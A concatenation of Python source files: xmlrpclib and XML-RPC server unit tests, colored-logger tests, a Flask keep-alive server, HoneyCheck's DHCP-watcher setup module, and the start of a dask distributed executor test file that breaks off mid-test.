'abase64': xmlrpclib.Binary("my dog has fleas"),
'boolean': xmlrpclib.False,
'unicode': u'\u4000\u6000\u8000',
u'ukey\u4000': 'regular value',
'datetime1': xmlrpclib.DateTime('20050210T11:41:23'),
'datetime2': xmlrpclib.DateTime(
(2005, 02, 10, 11, 41, 23, 0, 1, -1)),
'datetime3': xmlrpclib.DateTime(
datetime.datetime(2005, 02, 10, 11, 41, 23)),
}]
class XMLRPCTestCase(unittest.TestCase):
def test_dump_load(self):
self.assertEquals(alist,
xmlrpclib.loads(xmlrpclib.dumps((alist,)))[0][0])
def test_dump_bare_datetime(self):
# This checks that an unwrapped datetime.date object can be handled
# by the marshalling code. This can't be done via test_dump_load()
# since with use_datetime set to 1 the unmarshaller would create
# datetime objects for the 'datetime[123]' keys as well
dt = datetime.datetime(2005, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEquals(newdt, dt)
self.assertEquals(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEquals(newdt, xmlrpclib.DateTime('20050210T11:41:23'))
def test_datetime_before_1900(self):
# same as before but with a date before 1900
dt = datetime.datetime(1, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEquals(newdt, dt)
self.assertEquals(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEquals(newdt, xmlrpclib.DateTime('00010210T11:41:23'))
def test_cmp_datetime_DateTime(self):
now = datetime.datetime.now()
dt = xmlrpclib.DateTime(now.timetuple())
self.assert_(dt == now)
self.assert_(now == dt)
then = now + datetime.timedelta(seconds=4)
self.assert_(then >= dt)
self.assert_(dt < then)
def test_bug_1164912 (self):
d = xmlrpclib.DateTime()
((new_d,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((d,),
methodresponse=True))
self.assert_(isinstance(new_d.value, str))
# Check that the output of dumps() is still an 8-bit string
s = xmlrpclib.dumps((new_d,), methodresponse=True)
self.assert_(isinstance(s, str))
def test_newstyle_class(self):
class T(object):
pass
t = T()
t.x = 100
t.y = "Hello"
((t2,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((t,)))
self.assertEquals(t2, t.__dict__)
def test_dump_big_long(self):
self.assertRaises(OverflowError, xmlrpclib.dumps, (2L**99,))
def test_dump_bad_dict(self):
self.assertRaises(TypeError, xmlrpclib.dumps, ({(1,2,3): 1},))
def test_dump_recursive_seq(self):
l = [1,2,3]
t = [3,4,5,l]
l.append(t)
self.assertRaises(TypeError, xmlrpclib.dumps, (l,))
def test_dump_recursive_dict(self):
d = {'1':1, '2':1}
t = {'3':3, 'd':d}
d['t'] = t
self.assertRaises(TypeError, xmlrpclib.dumps, (d,))
def test_dump_big_int(self):
if sys.maxint > 2L**31-1:
self.assertRaises(OverflowError, xmlrpclib.dumps,
(int(2L**34),))
xmlrpclib.dumps((xmlrpclib.MAXINT, xmlrpclib.MININT))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MAXINT+1,))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MININT-1,))
def dummy_write(s):
pass
m = xmlrpclib.Marshaller()
m.dump_int(xmlrpclib.MAXINT, dummy_write)
m.dump_int(xmlrpclib.MININT, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MAXINT+1, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MININT-1, dummy_write)
def test_dump_none(self):
value = alist + [None]
arg1 = (alist + [None],)
strg = xmlrpclib.dumps(arg1, allow_none=True)
self.assertEquals(value,
xmlrpclib.loads(strg)[0][0])
self.assertRaises(TypeError, xmlrpclib.dumps, (arg1,))
def test_default_encoding_issues(self):
# SF bug #1115989: wrong decoding in '_stringify'
utf8 = """<?xml version='1.0' encoding='iso-8859-1'?>
<params>
<param><value>
<string>abc \x95</string>
</value></param>
<param><value>
<struct>
<member>
<name>def \x96</name>
<value><string>ghi \x97</string></value>
</member>
</struct>
</value></param>
</params>
"""
# sys.setdefaultencoding() normally doesn't exist after site.py is
# loaded. reload(sys) is the way to get it back.
old_encoding = sys.getdefaultencoding()
setdefaultencoding_existed = hasattr(sys, "setdefaultencoding")
reload(sys) # ugh!
sys.setdefaultencoding("iso-8859-1")
try:
(s, d), m = xmlrpclib.loads(utf8)
finally:
sys.setdefaultencoding(old_encoding)
if not setdefaultencoding_existed:
del sys.setdefaultencoding
items = d.items()
if have_unicode:
self.assertEquals(s, u"abc \x95")
self.assert_(isinstance(s, unicode))
self.assertEquals(items, [(u"def \x96", u"ghi \x97")])
self.assert_(isinstance(items[0][0], unicode))
self.assert_(isinstance(items[0][1], unicode))
else:
self.assertEquals(s, "abc \xc2\x95")
self.assertEquals(items, [("def \xc2\x96", "ghi \xc2\x97")])
class HelperTestCase(unittest.TestCase):
def test_escape(self):
self.assertEqual(xmlrpclib.escape("a&b"), "a&b")
self.assertEqual(xmlrpclib.escape("a<b"), "a<b")
self.assertEqual(xmlrpclib.escape("a>b"), "a>b")
class FaultTestCase(unittest.TestCase):
def test_repr(self):
f = xmlrpclib.Fault(42, 'Test Fault')
self.assertEqual(repr(f), "<Fault 42: 'Test Fault'>")
self.assertEqual(repr(f), str(f))
def test_dump_fault(self):
f = xmlrpclib.Fault(42, 'Test Fault')
s = xmlrpclib.dumps((f,))
(newf,), m = xmlrpclib.loads(s)
self.assertEquals(newf, {'faultCode': 42, 'faultString': 'Test Fault'})
self.assertEquals(m, None)
s = xmlrpclib.Marshaller().dumps(f)
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, s)
class DateTimeTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.DateTime()
def test_time(self):
d = 1181399930.036952
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", time.localtime(d)))
def test_time_tuple(self):
d = (2007,6,9,10,38,50,5,160,0)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070609T10:38:50')
def test_time_struct(self):
d = time.localtime(1181399930.036952)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", d))
def test_datetime_datetime(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070102T03:04:05')
def test_repr(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
val ="<DateTime '20070102T03:04:05' at %x>" % id(t)
self.assertEqual(repr(t), val)
def test_decode(self):
d = ' 20070908T07:11:13 '
t1 = xmlrpclib.DateTime()
t1.decode(d)
tref = xmlrpclib.DateTime(datetime.datetime(2007,9,8,7,11,13))
self.assertEqual(t1, tref)
t2 = xmlrpclib._datetime(d)
self.assertEqual(t2, tref)
class BinaryTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.Binary()
self.assertEqual(str(t), '')
def test_string(self):
d = '\x01\x02\x03abc123\xff\xfe'
t = xmlrpclib.Binary(d)
self.assertEqual(str(t), d)
def test_decode(self):
d = '\x01\x02\x03abc123\xff\xfe'
de = base64.encodestring(d)
t1 = xmlrpclib.Binary()
t1.decode(de)
self.assertEqual(str(t1), d)
t2 = xmlrpclib._binary(de)
self.assertEqual(str(t2), d)
PORT = None
# The evt is set twice. First when the server is ready to serve.
# Second when the server has been shutdown. The user must clear
# the event after it has been set the first time to catch the second set.
def http_server(evt, numrequests):
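# Serve up to `numrequests` XML-RPC requests on an ephemeral localhost port,
# publishing the chosen port through the global PORT and signalling readiness
# and shutdown through `evt`.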
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
def my_function():
'''This is my function'''
return True
class MyXMLRPCServer(SimpleXMLRPCServer.SimpleXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
try:
serv = MyXMLRPCServer(("localhost", 0),
logRequests=False, bind_and_activate=False)
serv.socket.settimeout(3)
serv.server_bind()
global PORT
PORT = serv.socket.getsockname()[1]
serv.server_activate()
serv.register_introspection_functions()
serv.register_multicall_functions()
serv.register_function(pow)
serv.register_function(lambda x,y: x+y, 'add')
serv.register_function(my_function)
serv.register_instance(TestInstanceClass())
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
# This function prevents errors like:
# <ProtocolError for localhost:57527/RPC2: 500 Internal Server Error>
def is_unavailable_exception(e):
'''Returns True if the given ProtocolError is the product of a server-side
exception caused by the 'temporarily unavailable' response sometimes
given by operations on non-blocking sockets.'''
# sometimes we get a -1 error code and/or empty headers
try:
if e.errcode == -1 or e.headers is None:
return True
exc_mess = e.headers.get('X-exception')
except AttributeError:
# Ignore socket.errors here.
exc_mess = str(e)
if exc_mess and 'temporarily unavailable' in exc_mess.lower():
return True
return False
# NOTE: The tests in SimpleServerTestCase will ignore failures caused by
# "temporarily unavailable" exceptions raised in SimpleXMLRPCServer. This
# condition occurs infrequently on some platforms, frequently on others, and
# is apparently caused by using SimpleXMLRPCServer with a non-blocking socket.
# If the server class is updated at some point in the future to handle this
# situation more gracefully, these tests should be modified appropriately.
class SimpleServerTestCase(unittest.TestCase):
def setUp(self):
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
threading.Thread(target=http_server, args=serv_args).start()
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# disable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
def test_simple1(self):
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
# [ch] The test 404 is causing lots of false alarms.
def XXXtest_404(self):
# send POST with httplib, it should return 404 header and
# 'Not Found' message.
conn = httplib.HTTPConnection('localhost', PORT)
conn.request('POST', '/this-is-not-valid')
response = conn.getresponse()
conn.close()
self.assertEqual(response.status, 404)
self.assertEqual(response.reason, 'Not Found')
def test_introspection1(self):
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
meth = p.system.listMethods()
expected_methods = set(['pow', 'div', 'my_function', 'add',
'system.listMethods', 'system.methodHelp',
'system.methodSignature', 'system.multicall'])
self.assertEqual(set(meth), expected_methods)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection2(self):
try:
# test _methodHelp()
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
divhelp = p.system.methodHelp('div')
self.assertEqual(divhelp, 'This is the div function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection3(self):
try:
# test native doc
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
myfunction = p.system.methodHelp('my_function')
self.assertEqual(myfunction, 'This is my function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection4(self):
# the SimpleXMLRPCServer doesn't support signatures, but
# at least check that we can try making the call
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
divsig = p.system.methodSignature('div')
self.assertEqual(divsig, 'signatures not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_multicall(self):
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
multicall = xmlrpclib.MultiCall(p)
multicall.add(2,3)
multicall.pow(6,8)
multicall.div(127,42)
add_result, pow_result, div_result = multicall()
self.assertEqual(add_result, 2+3)
self.assertEqual(pow_result, 6**8)
self.assertEqual(div_result, 127//42)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_non_existing_multicall(self):
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
multicall = xmlrpclib.MultiCall(p)
multicall.this_is_not_exists()
result = multicall()
# result.results contains:
# [{'faultCode': 1, 'faultString': '<type \'exceptions.Exception\'>:'
# 'method "this_is_not_exists" is not supported'>}]
self.assertEqual(result.results[0]['faultCode'], 1)
self.assertEqual(result.results[0]['faultString'],
'<type \'exceptions.Exception\'>:method "this_is_not_exists" '
'is not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_dotted_attribute(self):
# Raises an AttributeError because private methods are not allowed.
self.assertRaises(AttributeError,
SimpleXMLRPCServer.resolve_dotted_attribute, str, '__add')
self.assert_(SimpleXMLRPCServer.resolve_dotted_attribute(str, 'title'))
# Get the test to run faster by sending a request with test_simple1.
# This avoids waiting for the socket timeout.
self.test_simple1()
# This is a contrived way to make a failure occur on the server side
# in order to test the _send_traceback_header flag on the server
class FailingMessageClass(mimetools.Message):
def __getitem__(self, key):
key = key.lower()
if key == 'content-length':
return 'I am broken'
return mimetools.Message.__getitem__(self, key)
class FailingServerTestCase(unittest.TestCase):
def setUp(self):
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
threading.Thread(target=http_server, args=serv_args).start()
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# reset flag
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
# reset message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = mimetools.Message
def test_basic(self):
# check that flag is false by default
flagval = SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header
self.assertEqual(flagval, False)
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
# test a call that shouldn't fail just as a smoke test
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_fail_no_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# The two server-side error headers shouldn't be sent back in this case
self.assertTrue(e.headers.get("X-exception") is None)
self.assertTrue(e.headers.get("X-traceback") is None)
else:
self.fail('ProtocolError not raised')
def test_fail_with_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
# Check that errors in the server send back exception/traceback
# info when flag is set
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# We should get error info in the response
expected_err = "invalid literal for int() with base 10: 'I am broken'"
self.assertEqual(e.headers.get("x-exception"), expected_err)
self.assertTrue(e.headers.get("x-traceback") is not None)
else:
self.fail('ProtocolError not raised')
class CGIHandlerTestCase(unittest.TestCase):
def setUp(self):
self.cgi = SimpleXMLRPCServer.CGIXMLRPCRequestHandler()
def tearDown(self):
self.cgi = None
def test_cgi_get(self):
os.environ['REQUEST_METHOD'] = 'GET'
# if the method is GET and no request_text is given, it runs handle_get
# capture stdout output
tmp = sys.stdout
sys.stdout = open(test_support.TESTFN, "w")
self.cgi.handle_request()
sys.stdout.close()
sys.stdout = tmp
# parse Status header
handle = open(test_support.TESTFN, "r").read()
status = handle.split()[1]
message = ' '.join(handle.split()[2:4])
self.assertEqual(status, '400')
self.assertEqual(message, 'Bad Request')
os.remove(test_support.TESTFN)
os.environ['REQUEST_METHOD'] = ''
def test_cgi_xmlrpc_response(self):
data = """<?xml version='1.0'?>
<methodCall>
<methodName>test_method</methodName>
<params>
<param>
<value><string>foo</string></value>
</param>
<param>
<value><string>bar</string></value>
</param>
</params>
</methodCall>
"""
open("xmldata.txt", "w").write(data)
tmp1 = sys.stdin
tmp2 = sys.stdout
sys.stdin = open("xmldata.txt", "r")
sys.stdout = open(test_support.TESTFN, "w")
self.cgi.handle_request()
sys.stdin.close()
sys.stdout.close()
sys.stdin = tmp1
sys.stdout = tmp2
# the response should contain a Fault; if so, our goal is achieved ;)
handle = open(test_support.TESTFN, "r").read()
# skip the first 44 chars so as not to include the HTTP header; we only need the XML
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, handle[44:])
os.remove("xmldata.txt")
os.remove(test_support.TESTFN)
def test_main():
xmlrpc_tests = [XMLRPCTestCase, HelperTestCase, DateTimeTestCase,
BinaryTestCase, FaultTestCase]
# The test cases against a SimpleXMLRPCServer raise a socket error
# 10035 (WSAEWOULDBLOCK) in the server thread handle_request call when
# run on Windows. This only happens on the first test to run, but it
# fails every time and so these tests are skipped on win32 platforms.
if sys.platform != 'win32':
xmlrpc_tests.append(SimpleServerTestCase)
xmlrpc_tests.append(FailingServerTestCase)
xmlrpc_tests.append(CGIHandlerTestCase)
test_support.run_unittest(*xmlrpc_tests)
if __name__ == "__main__":
test_main()
|
test_colored_logger.py
|
import io
import logging
import random
import six
import string
import unittest
from friendlylog import colored_logger as logger
from threading import Thread
# Tests cannot be executed in parallel due to the hack in the setUp method.
class TestColoredLogger(unittest.TestCase):
def setUp(self):
# Remove handler that outputs to STDERR.
logger.inner_logger.removeHandler(logger.inner_stream_handler)
# Add handler that outputs to StringIO.
if six.PY2:
self.log_capture = io.BytesIO()
else:
self.log_capture = io.StringIO()
handler = logging.StreamHandler(self.log_capture)
handler.setFormatter(logger.inner_formatter)
logger.inner_logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
def tearDown(self):
pass
def last_line(self):
log = self.log_capture.getvalue().splitlines()
if len(log) == 0:
return []
return log[-1]
def last_n_lines(self, n):
log = self.log_capture.getvalue().splitlines()
return log[-n:]
def num_lines(self):
return len(self.log_capture.getvalue().splitlines())
def test_level_is_logged(self):
logger.debug("message 1")
self.assertIn("DEBUG", self.last_line())
logger.info("message 2")
self.assertIn("INFO", self.last_line())
logger.warning("message 3")
self.assertIn("WARNING", self.last_line())
logger.error("message 4")
self.assertIn("ERROR", self.last_line())
logger.critical("message 5")
self.assertIn("CRITICAL", self.last_line())
def test_function_is_logged(self):
logger.debug("message 1")
self.assertIn(" test_function_is_logged", self.last_line())
logger.info("message 2")
self.assertIn(" test_function_is_logged", self.last_line())
logger.warning("message 3")
self.assertIn(" test_function_is_logged", self.last_line())
logger.error("message 4")
self.assertIn(" test_function_is_logged", self.last_line())
logger.critical("message 5")
self.assertIn(" test_function_is_logged", self.last_line())
def test_filepath_is_logged(self):
logger.debug("message 1")
self.assertIn("test_colored_logger.py", self.last_line())
logger.info("message 2")
self.assertIn("test_colored_logger.py", self.last_line())
logger.warning("message 3")
self.assertIn("test_colored_logger.py", self.last_line())
logger.error("message 4")
self.assertIn("test_colored_logger.py", self.last_line())
logger.critical("message 5")
self.assertIn("test_colored_logger.py", self.last_line())
def test_message_is_logged(self):
logger.debug("message 1")
self.assertIn("message 1", self.last_line())
logger.info("message 2")
self.assertIn("message 2", self.last_line())
logger.warning("message 3")
self.assertIn("message 3", self.last_line())
logger.error("message 4")
self.assertIn("message 4", self.last_line())
logger.critical("message 5")
self.assertIn("message 5", self.last_line())
def test_levels(self):
def log_all():
logger.debug("message 1")
logger.info("message 2")
logger.warning("message 3")
logger.error("message 4")
logger.critical("message 5")
def test_last(expected):
self.assertIsInstance(expected, list)
last_n = self.last_n_lines(len(expected))
self.assertEqual(len(last_n), len(expected))
for output, exp in zip(last_n, expected):
self.assertIn(exp, output)
expected_logs = [
"DEBUG: message 1",
"INFO: message 2",
"WARNING: message 3",
"ERROR: message 4",
"CRITICAL: message 5"
]
# Debug.
logger.setLevel(logging.DEBUG)
log_all()
self.assertEqual(self.num_lines(), 5)
test_last(expected_logs)
# Info.
logger.setLevel(logging.INFO)
log_all()
self.assertEqual(self.num_lines(), 5 + 4)
test_last(expected_logs[1:])
# Warning.
logger.setLevel(logging.WARNING)
log_all()
self.assertEqual(self.num_lines(), 5 + 4 + 3)
test_last(expected_logs[2:])
# Error.
logger.setLevel(logging.ERROR)
log_all()
self.assertEqual(self.num_lines(), 5 + 4 + 3 + 2)
test_last(expected_logs[3:])
# Critical.
logger.setLevel(logging.CRITICAL)
log_all()
self.assertEqual(self.num_lines(), 5 + 4 + 3 + 2 + 1)
test_last(expected_logs[4:])
def test_multi_threaded_is_ok(self):
num_threads = 75
def log_all(msg):
for _ in range(0, 11):
logger.debug(msg)
logger.info(msg)
logger.warning(msg)
logger.error(msg)
logger.critical(msg)
# Generate a random long message for each thread.
messages = []
for _ in range(0, num_threads):
msg = []
length = random.randint(500, 2000)
alphabet = string.punctuation + string.ascii_letters + string.digits # noqa: E501
for i in range(0, length):
msg.append(random.choice(list(alphabet)))
messages.append(''.join(msg))
self.assertNotIn('\n', messages[-1])
self.assertEqual(len(messages), num_threads)
# Create, start and stop threads.
threads = []
for i in range(0, num_threads):
threads.append(Thread(target=log_all, args=(messages[i],)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Check the output.
self.assertEqual(self.num_lines(), num_threads * 11 * 5)
log = self.log_capture.getvalue().splitlines()
for line in log:
self.assertEqual(line[0], '[')
self.assertGreater(len(line), 500)
# Count how many elements of array contain substr.
def count_in(array, substr):
cnt = 0
for el in array:
if substr in el:
cnt += 1
return cnt
for msg in messages:
self.assertEqual(count_in(log, msg), 11 * 5)
for level in ["DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"]:
self.assertEqual(count_in(log, level + ": " + msg), 11)
def test_terminal_logging(self):
logger.info("message to terminal device")
self.assertIn("INFO", self.last_line())
# 118 (the length without colors) + 4 coloring characters.
self.assertGreaterEqual(len(self.last_line()), 118 + 4)
def test_non_str_logging(self):
logger.info(10)
self.assertIn("10", self.last_line())
# These should not raise any errors.
logger.debug([10, 20, 30])
logger.critical({})
logger.warning(set([-1, 4]))
if __name__ == '__main__':
unittest.main()
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "SERVER IS RUNNING !!"
def run():
app.run(host='0.0.0.0', port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
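# Minimal usage sketch (an assumed pattern, not part of the original module):
#
#     from keep_alive import keep_alive
#     keep_alive()   # start the Flask "/" endpoint in a background thread
#     run_bot()      # hypothetical long-running work that follows
#
# The endpoint gives an external uptime monitor something to ping while the
# main work keeps running.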
|
app_preparation.py
|
#!/usr/bin/env python3
from threading import Thread
import importlib
from typing import List
import logging.handlers
import sys
from .modules.base_control import BaseControl, ControlConfiguration
from .dhcp_watchmen import DHCPWatchmen
LOG_LEVEL = logging.DEBUG
logger = logging.getLogger("elchicodepython.honeycheck")
logger.setLevel(LOG_LEVEL)
ch = logging.StreamHandler()
ch.setLevel(LOG_LEVEL)
formatter = logging.Formatter(
fmt="%(asctime)s - %(levelname)s - HoneyCheck %(message)s"
)
ch.setFormatter(formatter)
logger.addHandler(ch)
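# With the formatter above, records are emitted as
# "<asctime> - <LEVEL> - HoneyCheck <message>", e.g. (illustrative values)
# "2024-01-01 12:00:00,000 - INFO - HoneyCheck eth0: FOUND IN <config_file>".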
def get_control_objects(iface_config: dict, control_type: str) -> List[BaseControl]:
control_objects_str = [co.strip() for co in iface_config[control_type].split(",")]
control_objects = []
for control_object_str in control_objects_str:
# Import the control module defined in the configuration
control_object_module_str = ".".join(control_object_str.split('.')[:-1])
control_object_class_str = control_object_str.split('.')[-1]
try:
control_object_module = importlib.import_module(
control_object_module_str
)
except ModuleNotFoundError:
logger.error(f"Module {control_object_module_str} not found")
continue
ControlClass = getattr(
control_object_module,
control_object_class_str
)
control_object = ControlClass() # Instance of the Control Object
control_configuration = ControlConfiguration(iface_config, control_type)
control_object.set_conf(control_configuration)
control_object_requirements = control_object.get_conf_req()
if control_object_requirements.check_dependencies(control_configuration):
if control_object_requirements.check_requirements(control_configuration):
control_objects.append(control_object)
else:
logger.critical(
"Requirements "
+ str(control_object_requirements.config_requirements)
+ " check failed in "
+ control_object_str
)
return []
else:
logger.critical(
"Dependencies check failed in module "
+ control_object_str
)
return []
return control_objects
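# A sketch of the per-interface configuration this function assumes (class
# paths are hypothetical): each control_type key holds a comma-separated list
# of dotted paths, e.g.
#
#     [eth0]
#     fail_test = honeycheck.modules.example_control.ExampleControl
#
# Each path is split into its module and class parts, imported, instantiated
# and configured before being returned.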
def start_the_party(config: dict, config_file: str):
# If HoneyCheck is not configured, exit
if len(config.sections()) == 0:
logger.error(
"You should provide a valid configuration to honeycheck before using it\n"
"Read the docs at https://github.com/elchicodepython/HoneyCheck"
)
sys.exit(1)
ifaces = config.sections()
if len(ifaces) == 0:
logger.critical(
"Fail to check the configuration file in " + config_file
)
sys.exit(2)
for iface in ifaces:
logger.info(iface + ": FOUND IN " + config_file)
try:
timeout = int(config[iface]["discover_timeout"])
logger.info("Stablished timeout = %s seconds" % timeout)
except KeyError:
timeout = 10
logger.info(
"Stablished timeout = 10 for sending DHCP DISCOVER packets as DEFAULT"
)
whitelist = (
[]
if "whitelist" not in config[iface]
else [ip.strip() for ip in config[iface]["whitelist"].split(",")]
)
fail_objects = (
[]
if "fail_test" not in config[iface]
else get_control_objects(config[iface], "fail_test")
)
pass_objects = (
[]
if "pass_test" not in config[iface]
else get_control_objects(config[iface], "pass_test")
)
final_objects = (
[]
if "final_exec" not in config[iface]
else get_control_objects(config[iface], "final_exec")
)
watchmen = DHCPWatchmen(
iface, fail_objects, pass_objects, final_objects, whitelist
)
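# Two threads per interface: one sniffs DHCP traffic, the other periodically
# sends DHCP DISCOVER probes using the timeout configured above.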
Thread(target=watchmen.sniff_dhcp).start()
Thread(target=watchmen.dhcp_discovery_daemon, args=(timeout,)).start()
|
test_executor.py
|
from __future__ import print_function, division, absolute_import
from operator import add
from collections import Iterator
from concurrent.futures import CancelledError
import itertools
from multiprocessing import Process
import sys
from threading import Thread
from time import sleep, time
import traceback
import mock
import pytest
from toolz import (identity, isdistinct, first, concat, pluck, valmap,
partition_all)
from tornado import gen
from tornado.ioloop import IOLoop
from dask import delayed
from dask.context import _globals
from distributed import Worker, Nanny
from distributed.client import WrappedKey
from distributed.executor import (Executor, Future, CompatibleExecutor, _wait,
wait, _as_completed, as_completed, tokenize, _global_executor,
default_executor, _first_completed, ensure_default_get, futures_of)
from distributed.scheduler import Scheduler, KilledWorker
from distributed.sizeof import sizeof
from distributed.utils import sync, tmp_text, ignoring
from distributed.utils_test import (cluster, slow, slowinc, slowadd, randominc,
_test_scheduler, loop, inc, dec, div, throws,
gen_cluster, gen_test, double, deep)
@gen_cluster(executor=True)
def test_submit(e, s, a, b):
x = e.submit(inc, 10)
assert not x.done()
assert isinstance(x, Future)
assert x.executor is e
result = yield x._result()
assert result == 11
assert x.done()
y = e.submit(inc, 20)
z = e.submit(add, x, y)
result = yield z._result()
assert result == 11 + 21
@gen_cluster(executor=True)
def test_map(e, s, a, b):
L1 = e.map(inc, range(5))
assert len(L1) == 5
assert isdistinct(x.key for x in L1)
assert all(isinstance(x, Future) for x in L1)
result = yield L1[0]._result()
assert result == inc(0)
assert len(s.tasks) == 5
L2 = e.map(inc, L1)
result = yield L2[1]._result()
assert result == inc(inc(1))
assert len(s.tasks) == 10
# assert L1[0].key in s.tasks[L2[0].key]
total = e.submit(sum, L2)
result = yield total._result()
assert result == sum(map(inc, map(inc, range(5))))
L3 = e.map(add, L1, L2)
result = yield L3[1]._result()
assert result == inc(1) + inc(inc(1))
L4 = e.map(add, range(3), range(4))
results = yield e._gather(L4)
if sys.version_info[0] >= 3:
assert results == list(map(add, range(3), range(4)))
def f(x, y=10):
return x + y
L5 = e.map(f, range(5), y=5)
results = yield e._gather(L5)
assert results == list(range(5, 10))
y = e.submit(f, 10)
L6 = e.map(f, range(5), y=y)
results = yield e._gather(L6)
assert results == list(range(20, 25))
@gen_cluster()
def test_compatible_map(s, a, b):
e = CompatibleExecutor((s.ip, s.port), start=False)
yield e._start()
results = e.map(inc, range(5))
assert not isinstance(results, list)
# Since this map blocks as it waits for results,
# waiting here will block the current IOLoop,
# which happens to also be running the test Workers.
# So wait on the results in a background thread to avoid blocking.
